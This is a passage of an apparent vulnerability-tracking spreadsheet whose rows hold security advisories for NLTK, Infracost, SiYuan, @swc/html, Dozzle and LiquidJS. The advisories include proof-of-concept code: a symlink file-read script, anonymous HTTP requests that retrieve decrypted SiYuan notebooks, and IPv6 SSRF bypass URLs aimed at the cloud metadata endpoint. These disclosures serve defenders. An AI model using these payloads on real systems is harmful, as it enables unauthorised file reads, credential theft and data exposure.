Any app rendering attacker-influenced templates with `memoryLimit` set (LiquidJS docs list it as covering "array concat/join/strftime") can have that control bypassed by one short template, forcing allocation well past budget up to a process crash. `split`/`concat` are correctly charged; the gap is `join`'s own accounting of its own output. (LiquidJS's security-model docs call these limits "cooperative safeguards, not strict isolation" — doesn't change that `join`'s charge is wrong relative to what it allocates.)</t></is></c><c r="T15" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69222</t></is></c></row><row r="16"><c r="A16" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B16" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C16" s="5" t="inlineStr"><is><t>CVE-2026-70626</t></is></c><c r="D16" s="5" t="inlineStr" /><c r="E16" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F16" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G16" s="5" t="inlineStr" /><c r="H16" s="5" t="n"><v>0.002</v></c><c r="I16" s="5" t="inlineStr" /><c r="J16" s="5" t="inlineStr" /><c r="K16" s="5" t="inlineStr" /><c r="L16" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M16" s="5" t="inlineStr"><is><t>3.9.4</t></is></c><c r="N16" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O16" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P16" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q16" s="5" t="inlineStr" /><c r="R16" s="5" t="inlineStr" /><c r="S16" s="5" t="inlineStr"><is><t>### Summary
`nltk.corpus.reader.api.CorpusReader.open()` can be used to read files outside the intended corpus root via a symlink placed inside that root. Although NLTK blocks absolute paths and `..` traversal, the current boundary check is only lexical and does not account for symlink resolution. This leads to an arbitrary local file read / filesystem sandbox bypass for applications that rely on `CorpusReader` or `FileSystemPathPointer` to restrict file access.

### Details
The vulnerable flow is:

- [`nltk/corpus/reader/api.py:222`](/mnt/Data/my_brains/test/nltk/nltk/corpus/reader/api.py#L222)
  - `CorpusReader.open()` blocks absolute paths and `..`, then calls `self._root.join(file).open()`

- [`nltk/data.py:398`](/mnt/Data/my_brains/test/nltk/nltk/data.py#L398)
  - `FileSystemPathPointer.join()` joins the requested file ID and checks whether the resulting path still appears to remain under the configured root

The problem is that the check is based on the lexical path after `os.path.normpath()`, not on the resolved path after following symlinks.

Current behavior:

1. `CorpusReader.open()` rejects:
   - absolute paths
   - `..` path traversal
2. `FileSystemPathPointer.join()` computes:
   - `joined = os.path.normpath(os.path.join(self._path, fileid))`
   - `root = os.path.normpath(self._path)`
3. It allows the access if `joined` starts with `root`

This misses the case where a path stays inside the root lexically, but resolves outside the root via a symlink already present under the allowed directory.

Example:

```text
JOINED=/tmp/nltk-root/link/secret.txt
REALPATH=/tmp/outside/secret.txt
```

`JOINED` still appears to be inside the root, but `REALPATH` is outside it.

This is distinct from simple `../` traversal:

- the file ID is not absolute
- the file ID does not contain `..`
- the escape only happens after filesystem resolution of a symlink under the allowed root

### PoC
Reproduced in an isolated Docker sandbox using the local `nltk` clone.

Minimal Python PoC:

```python
import os
import tempfile
from nltk.corpus.reader.api import CorpusReader

root = tempfile.mkdtemp(prefix="nltk-root-")
outside_dir = tempfile.mkdtemp(prefix="nltk-out-")
outside_file = os.path.join(outside_dir, "secret.txt")

with open(outside_file, "w") as f:
    f.write("secret-data")

os.symlink(outside_dir, os.path.join(root, "link"))

corpus = CorpusReader(root, ["link/secret.txt"])
with corpus.open("link/secret.txt") as f:
    print(f.read())
```

Observed result:

```text
secret-data
```

Docker re-test output:

```text
ROOT=/tmp/nltk-root-jjxay3if
OUTSIDE_DIR=/tmp/nltk-out-1kef36e0
JOINED=/tmp/nltk-root-jjxay3if/link/secret.txt
REALPATH=/tmp/nltk-out-1kef36e0/secret.txt
READ_OK=secret-data
INSIDE_ROOT=True
REAL_INSIDE_ROOT=False
```

Additional impact validation using a system file:

```text
ROOT=/tmp/nltk-root-_h5x4m19
JOINED=/tmp/nltk-root-_h5x4m19/hostfile
REALPATH=/etc/hostname
HOSTNAME_READ=48dafb244af3
INSIDE_ROOT=True
REAL_INSIDE_ROOT=False
```

This shows that the issue is not limited to attacker-created files outside the root; it can also read existing system files that are readable by the application user.

### Impact
This is an arbitrary local file read / symlink escape issue.

Who is impacted:

- applications that accept attacker-controlled corpus directories, extracted datasets, or package contents
- applications that rely on NLTK corpus readers as a trust boundary for file access
- any deployment where an attacker can place or influence files inside the allowed corpus root

Practical impact includes disclosure of:

- application secrets stored on disk
- local configuration files
- private datasets
- process-exposed files such as `/proc/self/environ`
- system files readable by the running user

The issue is best described as a filesystem sandbox bypass caused by improper link resolution before file access.</t></is></c><c r="T16" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70626</t></is></c></row><row r="17"><c r="A17" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B17" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C17" s="5" t="inlineStr"><is><t>CVE-2026-71493</t></is></c><c r="D17" s="5" t="inlineStr" /><c r="E17" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F17" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G17" s="5" t="inlineStr" /><c r="H17" s="5" t="n"><v>0.004</v></c><c r="I17" s="5" t="inlineStr" /><c r="J17" s="5" t="inlineStr" /><c r="K17" s="5" t="inlineStr" /><c r="L17" s="5" t="inlineStr"><is><t>Go:github.com/infracost/infracost</t></is></c><c r="M17" s="5" t="inlineStr"><is><t>0.10.45</t></is></c><c r="N17" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O17" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P17" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q17" s="5" t="inlineStr" /><c r="R17" s="5" t="inlineStr" /><c r="S17" s="5" t="inlineStr"><is><t>### Impact

Path traversal via link following in the Infracost config-template parser. The `readFile`, `pathExists`, `isDir`, and `matchPaths` template functions confined repo-supplied paths with a lexical `filepath.Rel` check plus a leaf-only `os.Lstat`:

```
{{ readFile "evil/file" }}
```

With an intermediate directory symlink committed in the repo (`evil -&gt; /`), the path is lexically clean and the leaf is a regular file, so both checks pass, but `os.ReadFile` follows the symlink and reads outside the checkout. The contents are rendered into the generated config and surfaced via the Infracost dashboard and PR comment, so anyone who can open a pull request can read files off the runner.

Affects `infracost` up to and including `v0.10.44`. Successful exploitation reads any file the CLI process can reach on the runner. Impact depends on what the run exposes: under `on: pull_request` (the configuration in Infracost's documentation) fork pull requests run without secrets and with a read-only token, so exposure is limited. If Infracost runs under `pull_request_target`, or is triggered by a same-repository pull request, the read reaches the repository's secrets, enabling secret theft. The patch confines all four functions regardless of trigger.

### Patches

Fixed in `v0.10.45` ([#3586](https://github.com/infracost/infracost/pull/3586)) by routing all four functions through `security.IsPathAllowed`, which resolves symlinks anywhere in the path before a segment-aware containment check. The same fix landed in [config#14](https://github.com/infracost/config/pull/14) and [parser#144](https://github.com/infracost/parser/pull/144).
  - Installed via the official script, a package manager, or the `latest` Docker tag: upgrade to `v0.10.45` (or later) to receive the fix.
  - Pinned to a specific version or image digest: bump to `v0.10.45`.

### Workarounds

No full fix without upgrading. To limit exposure: run Infracost under `on: pull_request` rather than `pull_request_target`, and keep fork pull requests from receiving secrets (the defaults).</t></is></c><c r="T17" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71493</t></is></c></row><row r="18"><c r="A18" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B18" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C18" s="5" t="inlineStr"><is><t>CVE-2026-71494</t></is></c><c r="D18" s="5" t="inlineStr" /><c r="E18" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F18" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G18" s="5" t="inlineStr" /><c r="H18" s="5" t="n"><v>0.004</v></c><c r="I18" s="5" t="inlineStr" /><c r="J18" s="5" t="inlineStr" /><c r="K18" s="5" t="inlineStr" /><c r="L18" s="5" t="inlineStr"><is><t>Go:github.com/infracost/infracost</t></is></c><c r="M18" s="5" t="inlineStr"><is><t>0.10.45</t></is></c><c r="N18" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O18" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P18" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q18" s="5" t="inlineStr" /><c r="R18" s="5" t="inlineStr" /><c r="S18" s="5" t="inlineStr"><is><t>### Impact

Sensitive information exposure in the Infracost Terraform Cloud/Enterprise integration. Several code paths attached a configured secret token to a request whose host was taken straight from the scanned Terraform, with no check that the host was the trusted endpoint. 

The condition that matters is whether a Terraform Cloud/Enterprise (or registry) token is present in the run: if one is, the injected hostname can disclose it. Impact therefore depends on the trigger. Under `on: pull_request` (the only configuration in Infracost's documentation) fork pull requests run without secrets, so no token is present. It only reaches token disclosure under `pull_request_target`, a same-repository pull request, or another CI setup that provides the token alongside untrusted Terraform, and exploiting an untrusted fork pull request also typically needs a maintainer to approve the workflow run. The patch scopes the token to the trusted host regardless of trigger.

### Patches

Fixed in `v0.10.45` ([#3590](https://github.com/infracost/infracost/pull/3590)) by attaching a token only when the destination host matches the configured trusted host; otherwise Infracost refuses to send it and skips remote variable loading
  - Installed via the official script, a package manager, or the `latest` Docker tag: upgrade to `v0.10.45` (or later) to receive the fix.
  - Pinned to a specific version or image digest: bump to `v0.10.45`.

### Workarounds

No full fix without upgrading. To limit exposure: use `on: pull_request` rather than `pull_request_target`, pin `organization`, `workspace`, and `host` in Infracost config so the `.tf` hostname is ignored, and keep Terraform Cloud and registry tokens out of runs that process untrusted pull request content.</t></is></c><c r="T18" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71494</t></is></c></row><row r="19"><c r="A19" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B19" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C19" s="5" t="inlineStr"><is><t>CVE-2026-72789</t></is></c><c r="D19" s="5" t="inlineStr" /><c r="E19" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F19" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G19" s="5" t="inlineStr" /><c r="H19" s="5" t="n"><v>0.003</v></c><c r="I19" s="5" t="inlineStr" /><c r="J19" s="5" t="inlineStr" /><c r="K19" s="5" t="inlineStr" /><c r="L19" s="5" t="inlineStr"><is><t>Go:github.com/siyuan-note/siyuan/kernel</t></is></c><c r="M19" s="5" t="inlineStr"><is><t>0.0.0-20260726020813-a25c2dd06aae</t></is></c><c r="N19" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O19" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P19" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q19" s="5" t="inlineStr" /><c r="R19" s="5" t="inlineStr" /><c r="S19" s="5" t="inlineStr"><is><t>**CVE:** This vulnerability corresponds to [CVE-2026-72789](https://nvd.nist.gov/vuln/detail/CVE-2026-72789).

### Summary

`publishAccess.json` is an opt-out list. The publish gate returns *accessible* for anything not explicitly listed in it. Encrypted notebooks are never written into that file, because only the administrator-gated `setPublishAccess` writes it and no part of the encryption subsystem does. Consequently every encrypted notebook is publish-accessible as far as the gate is concerned.

While an encrypted notebook is unlocked, an anonymous reader in publish mode can list it, enumerate its documents, and retrieve their fully decrypted content. No key material, no password, and no cracking is involved. The kernel decrypts the data and serves it because the authorization layer never asks whether the notebook is encrypted.

This is reported as a defect in the gate rather than in any individual handler. Endpoints that were previously reviewed and found to apply the correct checks do apply them. The checks return true.

### Details

**The gate defaults to accessible.** `CheckPathAccessableByPublishIgnore(box, path, ignore)` iterates the ignore list and returns false only on a match:

```go
for _, item := range publishIgnore {
    if item.ID == box || strings.Contains(path, item.ID) {
        return false
    }
}
return true   // unlisted means accessible
```

**Encrypted notebooks are never listed.** `publishAccess.json` is written only by `setPublishAccess` (`kernel/api/router.go:169`), which carries `CheckAdminRole` and `CheckReadonly`. Nothing in `crypto.go`, `encrypted_ops.go` or `notebook_crypto.go` writes to it. An administrator would have to manually add each encrypted notebook to the ignore list to protect it, and nothing in the product prompts or documents that.

**Neither core gate rejects them.** On both `eef105683` and `v3.7.4-alpha.1`:

```go
func checkBlockTreeAccessableByPublishAccess(...) bool {
    return CheckPathAccessableByPublishIgnore(bt.BoxID, bt.Path, publishIgnore) &amp;&amp;
           (password == "" || CheckPublishAuthCookie(c, passwordID, password))
}
```

For an encrypted notebook the first term is true because it is unlisted, and the second is true because encrypted notebooks carry no publish password. The conjunction returns true.

`IsEncryptedBox` does not appear in `kernel/model/publish_access.go` at all on master. On the development branch it appears once, inside `parseAttributeViewForPublishAccess`, where it routes *into* encrypted boxes rather than excluding them. The publish authorization layer has no concept of an encrypted notebook.

**The chain.** Verified on the development branch, which is the harder target because the block-metadata, attribute-view, path-resolution and encrypted-notebook-status fixes have all landed there.

1. `lsNotebooks` calls `ListNotebooks()`, which includes encrypted notebooks and reports `Encrypted: boxConf.Encrypted` without filtering on it. The reader filter skips only notebooks that are `Closed` or publish-invisible. An unlocked encrypted notebook is neither, so it is returned to an anonymous reader together with its identifier.
2. `listDocsByPath{notebook: &lt;encrypted box id&gt;, path: "/"}` applies only `CheckPathAccessableByPublishIgnore`, which passes, returning the document identifiers and titles inside the encrypted notebook.
3. `getDoc` routes to `GetDocInBox(...)`, after which `FilterContentByPublishAccess(...)` returns the content unmodified because the box is unlisted. The response is the fully decrypted document. `getBlockKramdown` reaches `GetBlockKramdownInBox` for the same result in Markdown.

Handlers reach the decrypted store through `encryptedNotebookFromArg(arg)` on a client-supplied notebook argument. This function predates the current release and is not a recent addition.

**The precondition is the unlock window.** `GetBlockTreeInBox` returns nil while a notebook is locked, treating it as nonexistent, and non-nil once unlocked. So the exposure is bounded to the period during which the legitimate user has the notebook open, which is precisely the period in which they are working in it. No action by the attacker triggers or extends that window, but no unusual condition is required either.

**On endpoints previously assessed as correctly gated.** `getBlockDOM` and `getBlockKramdown` apply password and visibility checks. `exportPreview` applies `FilterContentByPublishAccess`. Those assessments are accurate and this report does not contradict them. The checks execute and return true, because the visibility term resolves to accessible for an unlisted box and the password term is vacuous for a notebook that has no publish password. Patching any individual handler would not change that result.

### Proof of Concept

Precondition: publish mode enabled (default port 6808), anonymous when `Publish.Auth.Enable` is `false`, otherwise any publish reader account. An encrypted notebook that is currently unlocked by the legitimate user.

Step 1, obtain the encrypted notebook's identifier:

```
POST http://127.0.0.1:6808/api/notebook/lsNotebooks
{}

→ 200. The list includes the encrypted notebook, with encrypted: true and its id.
```

Step 2, enumerate its documents:

```
POST http://127.0.0.1:6808/api/filetree/listDocsByPath
{"notebook":"&lt;encrypted box id&gt;","path":"/"}

→ 200, document identifiers and titles from inside the encrypted notebook
```

Step 3, retrieve decrypted content:

```
POST http://127.0.0.1:6808/api/filetree/getDoc
{"id":"&lt;document id from step 2&gt;"}

→ 200, the fully decrypted document
```

`getBlockKramdown` returns the same content as decrypted Markdown. Repeating step 3 while the notebook is locked returns not-found, which confirms the unlock window is the only thing standing between an anonymous reader and the plaintext.

### Impact

The confidentiality guarantee of the encrypted-notebook feature is defeated against a remote, unauthenticated attacker for as long as the notebook is unlocked. A user who encrypts a notebook is expressing that its contents should be protected beyond the ordinary publish boundary. The publish gate does not recognise that intent, and instead treats the notebook as publicly readable because nobody added it to an opt-out list that the encryption feature does not write to.

The exposure is full document content rather than metadata, and it applies to every document in the notebook. It requires no key material, no password, no offline work and no interaction with the encryption subsystem at all.

### Suggested fix

Fail closed on encryption, independently of `publishAccess.json`:

```go
if IsEncryptedBox(bt.BoxID) {
    return false
}
```

in both `checkBlockTreeAccessableByPublishAccess` and `CheckBlockTreeMetadataAccessableByPublishAccess`, and exclude encrypted notebooks from `lsNotebooks` and `listDocsByPath` for read-only roles.

The broader point is the default. An opt-out authorization list means every future notebook type, storage backend or content class is publicly accessible until somebody remembers to add it. Encrypted notebooks are the case where that default is most clearly wrong, but they are unlikely to be the only one.</t></is></c><c r="T19" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72789</t></is></c></row><row r="20"><c r="A20" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B20" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C20" s="5" t="inlineStr"><is><t>CVE-2026-72790</t></is></c><c r="D20" s="5" t="inlineStr" /><c r="E20" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F20" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G20" s="5" t="inlineStr" /><c r="H20" s="5" t="n"><v>0.002</v></c><c r="I20" s="5" t="inlineStr" /><c r="J20" s="5" t="inlineStr" /><c r="K20" s="5" t="inlineStr" /><c r="L20" s="5" t="inlineStr"><is><t>Go:github.com/siyuan-note/siyuan/kernel</t></is></c><c r="M20" s="5" t="inlineStr"><is><t>0.0.0-20260726005141-9edb321eb451</t></is></c><c r="N20" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O20" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P20" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q20" s="5" t="inlineStr" /><c r="R20" s="5" t="inlineStr" /><c r="S20" s="5" t="inlineStr"><is><t>**CVE:** This vulnerability corresponds to [CVE-2026-72790](https://nvd.nist.gov/vuln/detail/CVE-2026-72790).

### Relationship to GHSA-8x84-r2ff-h8pq (please read first)

`getNotebookInfo` is named in the earlier advisory GHSA-8x84-r2ff-h8pq, in its remediation section, which asked for reader filtering on both `getNotebookConf` and `getNotebookInfo`. Commit `3bc014c7d` applied that filtering to `getNotebookConf` only.

That advisory grouped `getNotebookInfo` under `BoxCrypt`, and `getNotebookInfo` never returns `BoxCrypt`. Anyone checking the handler for key material would correctly find none and move on. This report corrects that characterisation and states what the handler actually discloses, which is notebook metadata rather than key material. If you would prefer this tracked as a follow-up on the original advisory rather than separately, that is entirely reasonable.

### Summary

`/api/notebook/getNotebookInfo` is registered with `CheckAuth` only and applies no authorization check of any kind. Given a notebook identifier, it returns that notebook's author-written name, document count, total size and creation and modification timestamps. It does so for every notebook the server has loaded, including notebooks that `lsNotebooks` deliberately withholds from readers because they are closed or not publish-visible.

### Details

| Item | Detail |
|---|---|
| Route | `kernel/api/router.go:123` `POST /api/notebook/getNotebookInfo` → `model.CheckAuth` → `getNotebookInfo` |
| Middleware | `CheckAuth` only, no `CheckReadonly`, no `CheckAdminRole` |
| Guard in handler | None. `IsReadOnlyRoleContext`, `publishAccess`, `Visible` and `Closed` all return zero matches |
| Exposed | `BoxInfo{ID, Name, DocCount, Size, HSize, Mtime, CTime, HMtime, HCtime}` |
| Affected refs | `eef105683` (v3.7.3, master HEAD) and `v3.7.4-alpha.1`, handler identical on both |

**The handler.** It validates `boxID` against the ID pattern, calls `box := model.Conf.Box(boxID)`, returns a not-found response if that is nil, and otherwise returns `box.GetInfo()` unmodified. `GetInfo()` (`kernel/model/box.go:470`) walks the notebook's files and returns the metadata listed above. There is no ownership check and no publish-access check anywhere on the path.

The nil branch is also a minor existence oracle: a valid-format identifier that names no loaded notebook is distinguishable from one that does.

**Guarded sibling.** `lsNotebooks`, the notebook lister, is also reader-reachable and does filter. For read-only roles it skips any notebook where `notebook.Closed` holds, and skips any notebook whose publish-access entry has `!item.Visible`. The codebase therefore intends closed and non-published notebooks to be invisible to readers. `getNotebookInfo` returns their name and statistics to any reader who supplies the identifier.

**Precedent.** GHSA-f2rw-w22v-54vh restricted `getEncryptedNotebookStatus`, which disclosed encrypted-notebook names and lock state, to administrators. `getNotebookInfo` is the non-encrypted analogue, disclosing regular notebook names and statistics including for notebooks outside the reader's publish scope, and was not restricted.

**Reachability, stated precisely, because it differs by branch.**

On v3.7.3 a reader can obtain the identifier of a notebook they cannot see, by chaining two endpoints that are currently ungated on that branch. `getBlockDefIDsByRefText` returns block and document identifiers workspace-wide, including from hidden notebooks. `getPathByID` then returns the owning notebook identifier for any such block, in its `notebook` field. `getFullHPathByID` additionally discloses the notebook name directly. The chain requires no special conditions beyond a reference text that occurs somewhere in the workspace.

On the development branch those sources are already closed. `getPathByID` now gates through `CheckBlockIdMetadataAccessableByPublishAccessInBox`, `getIDsByHPath` through `filterFileTreeBlockIDsByPublishDiscoverability`, and `getBlockDefIDsByRefText` and `getFullHPathByID` are likewise gated. Notebook identifiers are a fourteen-digit timestamp plus seven random characters, and `Conf.Box(boxID)` returns non-nil only for loaded notebooks, so guessing is not practical. A reader-reachable route on the development branch that yields the identifier of a hidden notebook was not found.

So on the development branch this is defence in depth rather than a live path. It is reported because the handler itself remains unguarded on both branches, and because closing it removes any dependence on those identifier sources staying gated in future.

### Proof of Concept

Precondition: publish mode enabled (default port 6808), anonymous when `Publish.Auth.Enable` is `false`, otherwise any publish reader account. A notebook that is closed or not publish-visible. Steps 1 and 2 apply to v3.7.3; on the development branch, start at step 3 with a known identifier.

Step 1, obtain block identifiers workspace-wide:

```
POST http://127.0.0.1:6808/api/block/getBlockDefIDsByRefText
{"anchor":"&lt;a word likely to occur anywhere in the workspace&gt;"}

→ 200, block and document identifiers including ones inside hidden notebooks
```

Step 2, resolve one to its owning notebook:

```
POST http://127.0.0.1:6808/api/filetree/getPathByID
{"id":"&lt;identifier from step 1&gt;"}

→ 200, the notebook field carries the hidden notebook's boxID
```

Step 3, read the notebook's metadata:

```
POST http://127.0.0.1:6808/api/notebook/getNotebookInfo
{"notebook":"&lt;boxID from step 2&gt;"}

→ 200, returns name, docCount, size, hSize, mtime, ctime, hMtime, hCtime
   for a notebook that lsNotebooks does not return to this same session
```

The differential is the point: call `lsNotebooks` with the same session and confirm the notebook is absent from the list, then call `getNotebookInfo` and receive its name and statistics.

### Impact

An anonymous reader in publish mode, or any publish `RoleReader`, can read the author-written name, document count, total size and activity timestamps of notebooks that are closed or not published, which are exactly the notebooks the notebook lister withholds from them. Notebook names are free text chosen by the author and routinely describe their contents. Document count and size indicate scale, and the modification timestamp reveals recent activity in a workspace area the reader has no access to. Confidentiality only, with no integrity or availability impact, and no document content is disclosed.

### Suggested fix

Apply the same filtering `lsNotebooks` already performs. When `IsReadOnlyRoleContext(c)` holds, return the not-found response unless the notebook is publish-visible and not closed, before calling `GetInfo()`. This is the reader filtering the earlier advisory's remediation section requested for this handler.</t></is></c><c r="T20" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72790</t></is></c></row><row r="21"><c r="A21" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B21" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C21" s="5" t="inlineStr"><is><t>CVE-2026-72925</t></is></c><c r="D21" s="5" t="inlineStr" /><c r="E21" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F21" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G21" s="5" t="inlineStr" /><c r="H21" s="5" t="n"><v>0.002</v></c><c r="I21" s="5" t="inlineStr" /><c r="J21" s="5" t="inlineStr" /><c r="K21" s="5" t="inlineStr" /><c r="L21" s="5" t="inlineStr"><is><t>crates.io:swc_html_minifier, npm:@swc/html</t></is></c><c r="M21" s="5" t="inlineStr"><is><t>1.15.47-nightly-20260729.1, 59.0.0</t></is></c><c r="N21" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O21" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P21" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q21" s="5" t="inlineStr" /><c r="R21" s="5" t="inlineStr" /><c r="S21" s="5" t="inlineStr"><is><t>## Impact

`@swc/html` minifies JSON contained in `script` elements such as
`application/json` and `application/ld+json` by parsing and serializing the
JSON value.

Before the patched versions, JSON serialization could convert escaped
less-than signs such as `\u003C` into literal `&lt;` characters. If the JSON
contained an escaped `&lt;/script&gt;` sequence, the generated HTML could terminate
the containing script element early because HTML tokenization occurs before
the JSON is consumed.

Applications that minify HTML containing attacker-controlled JSON data could
therefore transform inert data into active markup. A crafted payload could
execute script in the origin of the generated page.

## Patches

The issue is fixed in:

- `@swc/html` 1.15.47
- `swc_html_minifier` 59.0.0

The minifier now re-escapes less-than signs after JSON serialization, preserving
the script element boundary.

## Workarounds

Users who cannot upgrade can disable JSON minification with:

```js
await minify(html, {
  minifyJson: false,
});</t></is></c><c r="T21" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72925</t></is></c></row><row r="22"><c r="A22" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B22" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C22" s="5" t="inlineStr"><is><t>CVE-2026-73087</t></is></c><c r="D22" s="5" t="inlineStr" /><c r="E22" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F22" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G22" s="5" t="inlineStr" /><c r="H22" s="5" t="n"><v>0.003</v></c><c r="I22" s="5" t="inlineStr" /><c r="J22" s="5" t="inlineStr" /><c r="K22" s="5" t="inlineStr" /><c r="L22" s="5" t="inlineStr"><is><t>Go:github.com/amir20/dozzle</t></is></c><c r="M22" s="5" t="inlineStr"><is><t>1.29.1-0.20260804193351-8cf7ccd5ee04</t></is></c><c r="N22" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O22" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P22" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q22" s="5" t="inlineStr" /><c r="R22" s="5" t="inlineStr" /><c r="S22" s="5" t="inlineStr"><is><t>## Summary

The `isBlockedIP` SSRF guard in Dozzle's webhook notification dispatcher blocks loopback, link-local, multicast, and unspecified addresses but does not recognize IPv6 transition mechanism addresses (RFC 3056 6to4, RFC 6052 NAT64, RFC 4380 Teredo) that embed arbitrary IPv4 addresses. An authenticated user can bypass the guard to reach loopback services, cloud metadata endpoints (169.254.169.254), and other blocked ranges via webhook notification URLs.

## Affected component / versions

- Package: `github.com/amir20/dozzle`
- Affected versions: all versions with SSRF guard (current HEAD [`b9df313`](https://github.com/amir20/dozzle/commit/b9df31356fc024e6768a1aac605844dc041d95ee))
- Vulnerable code: `internal/notification/dispatcher/webhook.go`

## Details

### Root cause (CWE-918)

[`internal/notification/dispatcher/webhook.go:32-51`](https://github.com/amir20/dozzle/blob/b9df31356fc024e6768a1aac605844dc041d95ee/internal/notification/dispatcher/webhook.go#L32-L51):

```go
func isBlockedIP(ip net.IP) bool {
	if ip.IsLoopback() ||
		ip.IsLinkLocalUnicast() ||
		ip.IsLinkLocalMulticast() ||
		ip.IsMulticast() ||
		ip.IsInterfaceLocalMulticast() ||
		ip.IsUnspecified() {
		return true
	}
	if v4 := ip.To4(); v4 != nil &amp;&amp; zeroNetV4.Contains(v4) {
		return true
	}
	if ip.Equal(net.IPv4bcast) {
		return true
	}
	return false
}
```

The guard intentionally allows RFC 1918 private ranges for self-hosted webhook targets, but blocks loopback (127.0.0.0/8, ::1), link-local (169.254.0.0/16, fe80::/10), and other non-routable addresses. IPv6 transition mechanism addresses bypass all these checks:

| Mechanism | Prefix | Embeds | `isBlockedIP` result |
|-----------|--------|--------|---------------------|
| 6to4 | `2002::/16` | any IPv4 in bits 16-47 | `false` |
| NAT64 WKP | `64:ff9b::/96` | any IPv4 in bits 96-127 | `false` |
| Teredo | `2001:0000::/32` | any IPv4 in bits 96-127 | `false` |

### Reachability / trust boundary

The `safeDialContext` function (line 53) resolves hostnames and checks each IP against `isBlockedIP` before establishing a TCP connection. This is used as the `DialContext` for the webhook HTTP client (line 115).

Webhook URLs are configured by authenticated Dozzle users through the notification settings UI. The guard exists to prevent authenticated users from using webhook delivery as a proxy to reach the host machine's loopback services or cloud metadata endpoint.

### Attack chain

1. Authenticated user creates a webhook notification with URL `http://[2002:7f00:0001::1]:8080/` (6to4 embedding 127.0.0.1)
2. When a notification triggers, Dozzle's webhook dispatcher calls `safeDialContext`
3. The IPv6 address `2002:7f00:0001::1` is checked against `isBlockedIP` -- all predicates return false
4. Connection proceeds to the 6to4 relay which routes to 127.0.0.1
5. The webhook POST reaches the host's loopback services

## Impact

An authenticated user can bypass the SSRF guard to:

- Reach cloud metadata service at 169.254.169.254 via `2002:a9fe:a9fe::1` (6to4) to steal instance credentials
- Reach localhost services via `64:ff9b::7f00:1` (NAT64) or `2002:7f00:0001::1` (6to4)
- The webhook response body is logged at debug level but not returned to the user, making this a semi-blind SSRF (status code is returned)

Note: RFC 1918 private ranges are intentionally allowed by the guard. This bypass specifically targets the blocked ranges (loopback and link-local/metadata) that the guard explicitly intends to prevent.

## Proof of concept

Bypass vectors:

```
# 6to4 embedding 127.0.0.1 (bypasses IsLoopback)
http://[2002:7f00:0001::1]:8080/

# NAT64 embedding 169.254.169.254 (bypasses IsLinkLocalUnicast)
http://[64:ff9b::a9fe:a9fe]/latest/meta-data/

# 6to4 embedding 169.254.169.254 (bypasses IsLinkLocalUnicast)
http://[2002:a9fe:a9fe::1]/latest/meta-data/

# Teredo embedding 127.0.0.1
http://[2001:0000:dead:beef:0000:0000:7f00:0001]:8080/
```

Verification that `isBlockedIP` returns false for all vectors:

```go
package main

import (
    "fmt"
    "net"
)

func isBlockedIP(ip net.IP) bool {
    return ip.IsLoopback() || ip.IsLinkLocalUnicast() || ip.IsLinkLocalMulticast() ||
        ip.IsMulticast() || ip.IsInterfaceLocalMulticast() || ip.IsUnspecified()
}

func main() {
    for _, v := range []string{
